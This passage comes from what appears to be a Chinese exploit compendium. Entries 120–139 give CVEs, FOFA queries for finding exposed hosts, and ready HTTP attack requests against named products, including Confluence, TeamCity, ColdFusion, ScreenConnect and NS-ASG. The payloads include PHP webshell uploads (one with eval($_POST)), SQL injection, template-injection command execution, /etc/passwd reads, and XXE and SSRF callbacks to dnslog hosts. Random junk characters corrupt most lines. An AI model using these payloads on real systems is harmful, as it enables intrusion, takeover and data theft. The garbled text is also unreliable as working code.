X-Remote-Addr: 1.1.1.1/ u; t+ \5 ^0 b; d8 K f5 H1 F- ~
Te: trailers$ }$ O R d5 Z' _, D. ^
Connection: close
8 A) p% R" n0 k3 [2 D* x
3 v E: \% p Dsrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456" `7 V4 j* A' x9 l% D% {* y
! a( j9 B5 F. F5 l- t
- n- y+ l" r6 h8 L2 ~120. 北京百绰智能S40管理平台导入web.php任意文件上传
) h L I- J- U( w$ H) F( f2 ^CVE-2024-1253
) ~3 h* o6 x! F6 h9 C5 V$ MFOFA:title="Smart管理平台"7 v4 V+ l0 ^- z5 c& b; a
POST /useratte/web.php? HTTP/1.1$ P/ u% z" f& v8 A3 ^7 T
Host: ip:port4 ?8 b, M4 p- O( j" d2 |
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
8 i' q! f: }3 |& {0 U3 S. g; w$ HUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
}/ Q+ J2 d4 U u. V! J0 ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8# B+ J& U5 s1 o/ k8 D; D
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- ]) m6 b1 ^ u1 e3 T7 T
Accept-Encoding: gzip, deflate* J# {- s0 L- q' Y9 Q
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328* c1 W$ B* a9 E; Y# r8 \. Y6 d
Content-Length: 5972 e' P- ~5 x3 l' E. v
Origin: https://ip:port- |" |9 J$ v: h, Z
Referer: https://ip:port/sysmanage/licence.php7 w( g- B2 L x0 t' M U
Upgrade-Insecure-Requests: 1
& r9 x' j% _/ V* _Sec-Fetch-Dest: document2 l) S4 r1 P* A/ V
Sec-Fetch-Mode: navigate
* O+ D. i& Z$ Y0 k/ BSec-Fetch-Site: same-origin0 @7 Q* B- v0 A: s( a
Sec-Fetch-User: ?1, d- i4 R# s: v* x8 L' S
Te: trailers
3 v8 r+ j: m) h1 LConnection: close: y6 [& t# v- `, O8 e$ L* I7 W
5 y s7 e6 z( v( m-----------------------------42328904123665875270630079328
`3 |8 h# m' k2 qContent-Disposition: form-data; name="file_upload"; filename="2.php"
* i! t& `5 U* z8 @$ J1 d- HContent-Type: application/octet-stream' L9 W9 e& n, Y) S; p: D7 a" J
( I* I, {! l1 O# j7 m4 \<?php phpinfo()?>$ P# I1 j1 v4 t1 J& l0 H
-----------------------------42328904123665875270630079328
& s; {0 k3 F/ l% A! W; I: u* \& i5 UContent-Disposition: form-data; name="id_type"
7 T4 K/ u1 y, R: ^% t
7 H* [2 ^8 m& {1
( c& C& ~4 p/ u8 b9 H-----------------------------42328904123665875270630079328
) I- Y8 P% A% ~% yContent-Disposition: form-data; name="1_ck": f' x# O$ X, [, I8 } m2 ?3 \
& `8 O/ t0 T; y# b1 ~1_radhttp
" p3 o* t. t' r5 B, W1 r1 ]; o( S-----------------------------42328904123665875270630079328
6 O* L# E* b+ s7 @, X( h9 j% JContent-Disposition: form-data; name="mode" S7 W- L& W# ^& `
; ?1 d1 ?2 U- O! F: g" N! mimport; w( q' i% [2 d; V. ]
-----------------------------42328904123665875270630079328
% o* a+ E9 Y: E5 L7 K0 D, H E, N! X; y" g+ i6 [
0 d2 T. H* X% O% i2 @% H4 f
文件路径/upload/2.php
1 p4 N# c3 H! F5 b" ^, E0 R' j* J' b
121. 北京百绰智能S42管理平台userattestation.php任意文件上传" t6 K& ~& n. ~# D6 \9 K9 R- J
CVE-2024-1918
4 E$ R/ }% l5 |9 f+ }2 aFOFA:title="Smart管理平台"
2 K& L/ C8 S, p' j) f9 d( q/ {POST /useratte/userattestation.php HTTP/1.1
5 C2 F& m: H+ ~. ]8 N, Y, vHost: 192.168.40.130:8443
4 D; `1 p9 M" d0 B( m" W' XCookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac505 J) ]' q% K) p. R- G* l8 f; W
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko1 `! R7 U: T6 s. B6 l
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
. M0 R4 N+ `$ ?Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ Q/ K# v2 |. e' i) hAccept-Encoding: gzip, deflate
' k! a% l/ o, f% U, R4 YContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
, i4 W2 v5 Y# W& hContent-Length: 5928 J' A8 n& a8 F+ I9 v x
Origin: https://192.168.40.130:8443+ o; E/ a6 b N- G' K8 L: R& ^
Upgrade-Insecure-Requests: 1
R' r3 S! \0 n3 r( @" PSec-Fetch-Dest: document
' F/ L6 O2 I) {$ g- BSec-Fetch-Mode: navigate
( g' G6 R; R& TSec-Fetch-Site: same-origin" P/ }3 M+ R+ d, p
Sec-Fetch-User: ?1
: K, L; @6 X( c/ w2 h( ]$ d' C; sTe: trailers: i" K2 }( P( U" C6 s! C- `9 @
Connection: close; H7 X/ r# i8 |$ Q, w& [
- D% A$ X7 Y$ D8 E/ z) d/ c-----------------------------423289041236658752706300793282 ^: P* r, O @' |. x% \
Content-Disposition: form-data; name="web_img"; filename="1.php"
% O: ]7 O& }' X1 q h. L, ?Content-Type: application/octet-stream# C) _/ }$ t0 ] V5 y. i# l1 ^! {
4 t* x- @0 ]" Z7 s9 [- Z<?php phpinfo();?>
6 J" I; c4 |0 y L- q" S' _$ G-----------------------------42328904123665875270630079328) n$ b- K; E, ^( J/ I7 _
Content-Disposition: form-data; name="id_type": P0 h. ~8 K! k/ v c3 e0 }0 B% W
& X6 \! |# h% r ?, g |
1
6 J, m% q, E9 Z1 ^-----------------------------42328904123665875270630079328' ^: U3 C' j/ [$ w9 K9 R; O# T2 o
Content-Disposition: form-data; name="1_ck"& K0 X8 e2 K5 `
6 k/ P& N$ c8 `" J& y
1_radhttp
, w& Y1 I/ L8 v% F$ K+ k P8 @' j-----------------------------42328904123665875270630079328" x8 W6 V# p, v' c- C! Y+ K
Content-Disposition: form-data; name="hidwel"" l5 L1 G# a) q4 B( x M% j
9 K* w0 ^% X% ?( ~; [8 N6 Y
set
& d/ Q1 w C* b5 k& V-----------------------------42328904123665875270630079328
# d2 B0 a& i& ^' v, l
9 |4 Y7 l; A3 L1 I3 F) W9 L
8 R/ _! L8 A, a- g' Hboot/web/upload/weblogo/1.php
7 e2 O. u9 G- Y# e& W' n" w% S
5 Z! `9 n9 c% i G c( ~122. 北京百绰智能s200管理平台/importexport.php sql注入3 b6 o- W& }0 q2 `
CVE-2024-27718FOFA:title="Smart管理平台"
0 Q+ z3 d8 D; M' c' Q1 D( l其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()" S; u0 d j; L& Q4 {; @) z
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
8 }, U7 w$ V- OHost: x.x.x.x
! @* U, B Q2 s, H; rCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
/ m, ~; r. X: VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0/ c; |, J/ H0 H! S- P+ [, X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- V' x$ p- b* e( {Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 G; p4 b9 n6 f$ c3 m" J6 K8 u
Accept-Encoding: gzip, deflate, br+ _$ m/ m! X- y$ k- m# h4 @! `5 l
Upgrade-Insecure-Requests: 1
: h6 j( v1 X% j+ p+ V& h5 e! @+ ISec-Fetch-Dest: document
. A @' K% Q( N+ D4 JSec-Fetch-Mode: navigate
# a# F! i5 J" w' PSec-Fetch-Site: none z6 ?, S" [) ~1 P. g6 q& [8 b
Sec-Fetch-User: ?1* h' \% l5 x; L# I- m
Te: trailers
/ H8 B; y- r7 D: hConnection: close
6 q* [# I n% ?7 A! Z- W. r, T! g" |, k! e
! f) U, n- h) G
123. Atlassian Confluence 模板注入代码执行
7 x1 Y% D* d6 j5 |4 b! p2 FFOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
; {: N3 W! Q: U% ~+ T4 K, j( j. fPOST /template/aui/text-inline.vm HTTP/1.1
7 t" h; p- T" A; P+ k+ Q3 AHost: localhost:8090& X/ a' |; ?; \( i, ^* `' _
Accept-Encoding: gzip, deflate, br G6 o7 @5 \" E3 B( s
Accept: */*( A: Q* J) M8 Y5 @3 ~
Accept-Language: en-US;q=0.9,en;q=0.8
+ T$ Q$ ^4 i# g8 x- E2 S+ C. M6 CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.362 A2 y2 U" `8 f3 l2 L
Connection: close( H6 F: F0 `) j+ K) T7 D
Content-Type: application/x-www-form-urlencoded6 Z6 P. k4 P X4 c1 x0 B
6 ^; X* M2 P( m& Z6 Y
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
" x5 F2 w2 X; f7 f- q% {+ d2 p
5 p4 j+ G0 S, t, @
; t G5 ?& M( A7 n" a+ ~124. 湖南建研工程质量检测系统任意文件上传, P' l1 I" ^5 q
FOFA:body="/Content/Theme/Standard/webSite/login.css"
! `( i5 z0 Y/ u; SPOST /Scripts/admintool?type=updatefile HTTP/1.1! l) A2 h c" d, M( b3 K/ u( }! y
Host: 192.168.40.130:8282
' I+ E5 L5 D( |$ `) y' YUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.369 p( T3 b% b3 ~6 ~( f# \2 T5 U f
Content-Length: 72 d$ [9 X# ~! u+ _5 w3 U! G+ }4 ^% N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
# O: Q2 L" ]. J0 O0 c: |' g% \Accept-Encoding: gzip, deflate, br, N: _2 f! I/ v: {1 m
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, e! ?$ B) P6 h# u# WConnection: close
4 d" A* i$ a5 r$ ]8 [9 z) VContent-Type: application/x-www-form-urlencoded
4 F$ A# I0 X9 `8 B! v# T4 i( M, S9 N6 N
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>% R0 C" T! w4 q0 V6 P5 B
% S; O0 b; k- b( K8 }
6 b4 C5 G; \) M5 jhttp://192.168.40.130:8282/Scripts/abcgcg.aspx
5 |+ ~1 e7 B& K% ~. G) G* c# [* x' t, e, j8 ]
125. ConnectWise ScreenConnect身份验证绕过
% Y5 R2 r& `& _CVE-2024-1709, f( d: U6 a+ h' p
FOFA:icon_hash="-82958153"
& |! s3 B2 ~$ c7 m Bhttps://github.com/watchtowrlabs ... bypass-add-user-poc
8 x6 n5 o, Y0 l. Q* c- {0 z
7 k" K' q; A' q0 P( |+ `& K+ G1 f9 R0 J$ O
使用方法5 V9 v8 I0 C( j
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!) o, ]# r9 C: u0 {3 O: x6 E
/ y3 k( a$ E: n2 K, o, G
1 h% Q' B: {. b( c7 K2 P3 k- B1 `/ e" s创建好用户后直接登录后台,可以执行系统命令。' g/ w( Y4 T i8 p( q3 R- Q3 F
/ h- s' h7 L. @+ D- S2 L: }+ i
126. Aiohttp 路径遍历
- I/ M2 S/ f' R( l/ [) P$ wFOFA:title=="ComfyUI"
9 ?2 z9 r) r4 m6 s8 q% a' {+ |0 bGET /static/../../../../../etc/passwd HTTP/1.12 @/ M4 a. q# g7 c+ T
Host: x.x.x.x- a7 F8 G( I1 o0 c5 ]0 ~' {9 r; x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36) r6 V3 [8 V/ x$ q% I
Connection: close
% ^5 [$ K* e: V: M8 C3 y+ [' } qAccept: */** r6 m: L' a, d* q7 S% i s
Accept-Language: en5 R0 \: b1 V9 `, f$ N/ b9 t3 E# }& Y0 i
Accept-Encoding: gzip
7 Y3 e8 q5 B: L9 j% I8 c6 H* t. l
3 T% ^& a/ l- I3 S5 |+ O6 L+ L5 V1 K) I, Q. f2 x
127. 广联达Linkworks DataExchange.ashx XXE
/ N/ I1 I3 T0 F! O0 ^FOFA:body="Services/Identification/login.ashx" 2 u% U9 H- V6 s! f
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1; ?* c: C: N" \9 W
Host: 192.168.40.130:8888
' R+ t0 X$ j6 X5 TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.367 q9 E( {/ r3 Z2 {. C7 D7 M+ K' H
Content-Length: 415' r! N$ ?1 V# e4 F1 f+ E7 L
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: j' W( Y' z( X) r/ @& E" {4 `' y5 o7 nAccept-Encoding: gzip, deflate3 j/ w- ]! v4 M; [: c) U
Accept-Language: zh-CN,zh;q=0.9
9 x% J8 g H% i+ l$ `& @Connection: close9 `, S- s' b$ l% g& y
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
+ }% V) D. N {Purpose: prefetch% Z' c% f7 l$ B' @# ?
Sec-Purpose: prefetch;prerender
7 U8 w# ^: n, [6 ]
% M4 z: e& | }: C1 J------WebKitFormBoundaryJGgV5l5ta05yAIe0" H' D0 ~2 g% E- M! ~
Content-Disposition: form-data;name="SystemName"
: h. [! |1 A6 L4 g# w3 W
5 B* u, v4 O: g2 h( Z HBIM
, t. u, j3 C* D9 x \; g------WebKitFormBoundaryJGgV5l5ta05yAIe01 s: R3 s* ]9 Y& s
Content-Disposition: form-data;name="Params"- ]7 y0 h( ]2 L8 M. R
Content-Type: text/plain
+ z% w$ [# w- d' n- Z# H; O! V a6 A4 [* z$ B$ n
<?xml version="1.0" encoding="UTF-8"?>8 v& @) S, a$ \# O
<!DOCTYPE test [
8 \9 q7 ^6 D/ k8 Q<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
& W7 G) O$ L1 y+ h r]
1 W6 e( U$ M" O+ v1 s" \>3 `3 K2 C& `$ F3 _3 k" ?. t
<test>&t;</test>
0 ?. R. i: V6 x- S6 b/ t0 O------WebKitFormBoundaryJGgV5l5ta05yAIe0--! W+ s" V& Z, N
& {8 q8 ]6 ]9 n9 B( d- R3 V! x' \, n" O
* d) O, y/ ~7 |( n( [; x! d128. Adobe ColdFusion 反序列化
& p' @* B$ l, A' kCVE-2023-38203
0 @0 e* ]. }: W; EAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
6 O7 t n& G, g: v; iFOFA:app="Adobe-ColdFusion"
" W/ I& g* \, ]PAYLOAD$ ~5 S8 l3 `, s$ o3 _
, k5 r3 X# w5 l- q4 u5 q6 M129. Adobe ColdFusion 任意文件读取9 L( `0 o' y3 G% ?! l$ }/ G% }% k
CVE-2024-20767
9 H' c& Z) a% rFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request". V; k7 {+ a- o/ J! X( D+ ~8 H
第一步,获取uuid. d$ a: q6 a7 h4 d$ W8 t( v* o+ f
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1( ]5 K( G8 T2 }% K! S
Host: x.x.x.x5 [" N) a0 m8 R( U. X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.363 y9 i% i: H8 E# r' G2 M: V/ f
Accept: */*: V; M0 b" a6 b. ?" w0 \
Accept-Encoding: gzip, deflate6 C1 j0 c( J! V$ |' K9 ?
Connection: close, x2 ?6 ^3 x2 L9 }) C
5 r% L2 D( f4 n i' t
# t9 W8 G: k; U第二步,读取/etc/passwd文件
1 I& H. N8 c# [/ ?, i d, OGET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
% A* a. l8 { V" R. M, c2 gHost: x.x.x.x
! ~' ?" `6 \# R, V# AUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
/ _$ b5 |5 B9 P6 |* y5 D6 A6 jAccept: */*) s @: A t, L6 b
Accept-Encoding: gzip, deflate
9 s, A. [9 i: a( ?0 {% |, q$ [Connection: close1 _( h8 U- h; ]2 Q A
uuid: 85f60018-a654-4410-a783-f81cbd5000b93 }/ m8 \6 N/ }$ @. g
- U! u0 ^; w/ O" [$ v# t. M/ W. h* o
130. Laykefu客服系统任意文件上传
* n2 P! B2 ?; SFOFA:icon_hash="-334624619"
+ r3 T; A# U; B% F FPOST /admin/users/upavatar.html HTTP/1.1( ]( _1 z6 o: T; j$ x
Host: 127.0.0.1
7 v1 W1 a! G, m# x7 L [3 OAccept: application/json, text/javascript, */*; q=0.01
+ r. @ C5 Y( W# d+ O: m! V! X- AX-Requested-With: XMLHttpRequest
) b6 y |: s0 ?# yUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26# c+ M/ e8 h7 ^9 R
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR" b' q; j$ k: C
Accept-Encoding: gzip, deflate4 b: ]' v1 S$ P9 B- t: ?$ c
Accept-Language: zh-CN,zh;q=0.9( h ^0 J6 w; b, a6 R
Cookie: user_name=1; user_id=3/ ^ J S( l- J2 }* e
Connection: close
6 B8 F+ _: s/ e/ d( m( j( v" V# `) c: v" q( ?9 o: D; R3 v& Y
------WebKitFormBoundary3OCVBiwBVsNuB2kR
& R+ ?6 e7 a! ?3 a( aContent-Disposition: form-data; name="file"; filename="1.php"
1 X% A5 E. k' jContent-Type: image/png, ?% E+ b# E! l Q# p! P# z
; D. i. Q# S o: y( v3 m# N
<?php phpinfo();@eval($_POST['sec']);?>% \. D7 n# V2 l' |4 \
------WebKitFormBoundary3OCVBiwBVsNuB2kR--5 E0 ]9 G! L7 c1 M* d! y
" w1 k% E9 D7 n1 j2 k' h9 ~
8 S+ t0 \% |6 Q! C
131. Mini-Tmall <=20231017 SQL注入
2 X, s$ k* X1 n* eFOFA:icon_hash="-2087517259"
& `- o' r8 N4 D后台地址:http://localhost:8080/tmall/admin. L+ {; C% }7 l J7 k" D: J
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)( _& S1 Q& \9 x3 g& I
7 L# Z* z# I. k- i2 L! U132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
* d4 _2 l/ n; u& | MCVE-2024-27198) h2 @& } U; R! x6 s% n' K
FOFA:body="Log in to TeamCity"
) w' ?7 L! B. oPOST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
0 F: M$ S5 x$ v' d5 V! LHost: 192.168.40.130:8111* k1 P/ K+ n% b3 r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36! u" {& b0 v& c5 F- v; V/ l8 E
Accept: */*; J" t- p9 U. d- {$ v% B4 H
Content-Type: application/json
: C: a" L/ d% \6 sAccept-Encoding: gzip, deflate
# D( E5 E$ |( l# f+ t* Z# w6 o% I7 i( `$ a& f }$ m, j- F" |
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
! L- T5 O" ~+ a3 F- j: [# n' d, f9 W: F- I- M
9 q- b P* E7 J/ yCVE-2024-27199' `1 V: r% n& O) p
/res/../admin/diagnostic.jsp
1 d# G/ m, t) ?/.well-known/acme-challenge/../../admin/diagnostic.jsp
2 A( A# w' Y1 T9 [2 j& |1 `/update/../admin/diagnostic.jsp( z% }1 Q" L; A: R5 F: _$ b
: J, W' E, k% ?5 k+ y
9 }/ T; r# D1 C7 p4 o0 C, r( ACVE-2024-27198-RCE.py+ b3 c, b: v7 F( |. q
2 D/ z- }% b H133. H5 云商城 file.php 文件上传
0 B2 `# K% d1 G! z8 e& I6 K! LFOFA:body="/public/qbsp.php"
2 F, @4 ~# K) W- `, Q5 u; \* d7 APOST /admin/commodtiy/file.php?upload=1 HTTP/1.14 l% }/ b" I, E: g$ j x
Host: your-ip8 J P$ R& v( Z6 c, f& H% H! y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36/ Y: G: O& o- Z3 G
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
$ X% p2 i% \9 l, C$ J) E
2 [" A+ u/ l7 Y E3 B* S& L------WebKitFormBoundaryFQqYtrIWb8iBxUCx
" M" R& Y4 V" w sContent-Disposition: form-data; name="file"; filename="rce.php"
1 I6 e" u O$ U$ Y! f& |Content-Type: application/octet-stream
7 c& t: x L; n: g- G5 x$ g0 S
7 }# s$ ^) M' t6 n; G' j; [- R<?php system("cat /etc/passwd");unlink(__FILE__);?>
. I0 [3 Q$ L8 H$ t: V------WebKitFormBoundaryFQqYtrIWb8iBxUCx--: w# u# B# x8 l1 x( T E5 t* E0 N* k
4 E$ E( H" l( [* p# e* i
% p m5 q h, G" l% J3 F2 G+ ?
/ j. S- K% _$ d) b" |$ Y134. 网康NS-ASG应用安全网关index.php sql注入
* @& [' _& @1 h6 NCVE-2024-2330
( L2 g+ }; U5 A" e2 f; o+ e9 C* s, P4 yNetentsec NS-ASG Application Security Gateway 6.3版本
6 b" x, g8 `5 t2 uFOFA:app="网康科技-NS-ASG安全网关"
: c, v ?5 N) ?2 C# X, v; FPOST /protocol/index.php HTTP/1.1
% G0 G, P" M/ g1 }& XHost: x.x.x.x
+ O8 e0 H f3 E# WCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de) O: i0 d, `* |4 t% N# h! T, I. o
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
3 R6 ~( x8 R- {, P3 Y' f4 A" r sAccept: */*
; [) s$ {# U, T, P. _+ {Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 L8 T/ p% p' h8 J! h7 lAccept-Encoding: gzip, deflate
) _- \4 S! J7 ySec-Fetch-Dest: empty
5 L) [- G5 O/ w/ b/ YSec-Fetch-Mode: cors" ?# t' B* H, Z8 O" @# K
Sec-Fetch-Site: same-origin5 S' I' C1 W5 G, i8 |; O
Te: trailers
& U$ b1 R- i0 Y( p r" i1 `2 _7 rConnection: close7 n A0 u0 ~/ m# u# A9 _6 x
Content-Type: application/x-www-form-urlencoded
3 q" u; w/ v; y( q) l) `4 K) EContent-Length: 263
; W8 Y' W) {( F% N0 O2 d
& Q) [! W8 l. z& T* a& Tjsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}8 C8 [4 r; ~$ v" a9 ?% _
( p* Q, [: `" t, O7 Z! }6 L& G
) v+ n. \) w+ ?1 v, m135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入3 V8 i5 [% T7 t8 h" V
CVE-2024-2022
8 X4 r) g- O- `- dNetentsec NS-ASG Application Security Gateway 6.3版本
6 A' t H; t z6 }. GFOFA:app="网康科技-NS-ASG安全网关"
3 y& P# }8 i5 a. ?9 C1 }GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
$ q' p2 H4 o2 AHost: x.x.x.x
" I, n/ k/ s4 }9 kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" \: ~5 M( x3 ~& b0 h% F
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 {! r5 G3 J6 tAccept-Encoding: gzip, deflate
/ X1 o' ^+ m- e4 \4 gAccept-Language: zh-CN,zh;q=0.90 K+ C9 V8 p; M2 ^: c
Connection: close. b6 t9 C2 C+ G9 Y+ v
+ Q! I, P' N8 x( e6 O0 y/ [- n3 P
. t5 j8 i6 S- Q9 W( C4 |2 I
136. NextChat cors SSRF
& G# Y, y% d6 E5 l1 b9 rCVE-2023-497855 T, {5 b% [: B
FOFA:title="NextChat"
$ _) W; {4 z$ p2 |. z" R% QGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1: H- K1 _! w( i' N
Host: x.x.x.x:100000 D* f. N* K* \. `7 n6 d# i' _
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36; p8 ]: r1 q' C9 p
Connection: close
# m1 p+ F) W) S% X5 y5 p" q* @Accept: */*. w" f U* ~; v! p+ X' l
Accept-Language: en! K$ X" C" w# u% S8 L+ ?
Accept-Encoding: gzip% C' \" @% _% }# D: P3 l6 {7 Y
5 B* v \ u. t3 S9 k
# P' l8 J8 h7 D! b5 J+ O0 c
137. 福建科立迅通信指挥调度平台down_file.php sql注入
1 E; h$ _3 `/ oCVE-2024-2620- ~0 ?2 I7 v- R0 g, ?& L* \5 j
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
/ P0 z y# X L& h$ B9 f* u8 {GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1& h' O5 _" u7 H7 |0 a* F
Host: x.x.x.x
/ M( }5 i+ |0 ?; G9 }4 x, m4 ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
% q$ \; A( F& BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! x& c% g2 {: @0 |4 P. I* \' A
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; I- q: r7 g3 e
Accept-Encoding: gzip, deflate, br
( q8 t1 [8 Z& k. GConnection: close& k( Z6 e ?' m) ]5 g
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
* X3 F/ N( K: ]: W- a6 HUpgrade-Insecure-Requests: 11 s% h" n& @7 T S% ~4 a( e1 h3 }! G
( h& ~1 `) M( s# @! w
, Q( O% x9 e( O% R138. 福建科立讯通信指挥调度平台pwd_update.php sql注入5 |4 N F" C; H# @5 y$ G+ T
CVE-2024-2621) G2 W5 o* v# M5 \, ~8 e( B
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
3 v# a+ x- L4 X" w7 r1 jGET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
& E6 Q! y, G; D, g* z9 W* aHost: x.x.x.x" a' C. u1 c3 T( m6 ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
# o6 o# l* u/ g" X W' l6 l: VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.87 l5 T. W& X1 y( y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, V3 V8 ^2 ^7 [Accept-Encoding: gzip, deflate, br& H' S4 }: u( |+ l
Connection: close' F' \1 S+ x- s+ b
Upgrade-Insecure-Requests: 1
, e4 ] a9 M4 U1 T4 p8 c" N. v, N8 i, m
* V9 j8 [6 }1 {
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
7 ?. d# F% d3 h8 DCVE-2024-2622
- {% S% f+ D8 g9 v8 ^0 }0 N8 eFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"( t R9 r# M- C! [- U8 q2 g: I
